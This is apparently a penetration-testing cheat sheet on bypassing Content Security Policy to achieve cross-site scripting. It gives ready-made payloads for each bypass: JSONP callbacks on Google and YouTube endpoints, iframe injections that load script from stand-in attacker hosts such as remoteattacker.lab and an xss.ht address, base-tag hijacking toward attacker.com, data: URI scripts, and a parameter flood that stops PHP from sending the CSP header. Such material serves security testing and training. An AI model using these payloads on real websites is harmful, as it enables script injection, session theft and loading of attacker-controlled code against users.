6.4 KiB
CSP Bypass
A Content Security Policy (CSP) is a security feature that helps prevent cross-site scripting (XSS), data injection attacks, and other code-injection vulnerabilities in web applications. It works by specifying which sources of content (like scripts, styles, images, etc.) are allowed to load and execute on a webpage.
Summary
- CSP Detection
- Bypass CSP using JSONP
- Bypass CSP default-src
- Bypass CSP inline eval
- Bypass CSP unsafe-inline
- Bypass CSP script-src self
- Bypass CSP script-src data
- Bypass CSP nonce
- Bypass CSP header sent by PHP
- Labs
- References
CSP Detection
Check the CSP on https://csp-evaluator.withgoogle.com and the post : How to use Google’s CSP Evaluator to bypass CSP
Bypass CSP using JSONP
Requirements:
- CSP:
script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
Payload:
Use a callback function from a whitelisted source listed in the CSP.
- Google Search:
//google.com/complete/search?client=chrome&jsonp=alert(1);
- Google Account:
https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)
- Google Translate:
https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();
- Youtube:
https://www.youtube.com/oembed?callback=alert;
- Intruders/jsonp_endpoint.txt
- JSONBee/jsonp.txt
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
Bypass CSP default-src
Requirements:
- CSP like
Content-Security-Policy: default-src 'self' 'unsafe-inline';
,
Payload:
http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;
script=document.createElement('script');
script.src='//remoteattacker.lab/csp.js';
window.frames[0].document.head.appendChild(script);
Source: lab.wallarm.com
Bypass CSP inline eval
Requirements:
- CSP
inline
oreval
Payload:
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
Source: Rhynorater
Bypass CSP script-src self
Requirements:
- CSP like
script-src self
Payload:
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
Source: @akita_zen
Bypass CSP script-src data
Requirements:
- CSP like
script-src 'self' data:
as warned about in the official mozilla documentation.
Payload:
<script src="data:,alert(1)">/</script>
Source: @404death
Bypass CSP unsafe-inline
Requirements:
- CSP:
script-src https://google.com 'unsafe-inline';
Payload:
"/><script>alert(1);</script>
Bypass CSP nonce
Requirements:
- CSP like
script-src 'nonce-RANDOM_NONCE'
- Imported JS file with a relative link:
<script src='/PATH.js'></script>
Payload:
- Inject a base tag.
<base href=http://www.attacker.com>
- Host your custom js file at the same path that one of the website's script.
http://www.attacker.com/PATH.js
Bypass CSP header sent by PHP
Requirements:
- CSP sent by PHP
header()
function
Payload:
In default php:apache
image configuration, PHP cannot modify headers when the response's data has already been written. This event occurs when a warning is raised by PHP engine.
Here are several ways to generate a warning:
- 1000 $_GET parameters
- 1000 $_POST parameters
- 20 $_FILES
If the Warning are configured to be displayed you should get these:
- Warning:
PHP Request Startup: Input variables exceeded 1000. To increase the limit change max_input_vars in php.ini. in Unknown on line 0
- Warning:
Cannot modify header information - headers already sent in /var/www/html/index.php on line 2
GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a&a&a&a
Source: @pilvar222
Labs
- Root Me - CSP Bypass - Inline Code
- Root Me - CSP Bypass - Nonce
- Root Me - CSP Bypass - Nonce 2
- Root Me - CSP Bypass - Dangling Markup
- Root Me - CSP Bypass - Dangling Markup 2
- Root Me - CSP Bypass - JSONP
References
- Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017
- D1T1 - So We Broke All CSPs - Michele Spagnuolo and Lukas Weichselbaum - 27 Jun 2017
- Making an XSS triggered by CSP bypass on Twitter - wiki.ioin.in(查看原文) - 2020-04-06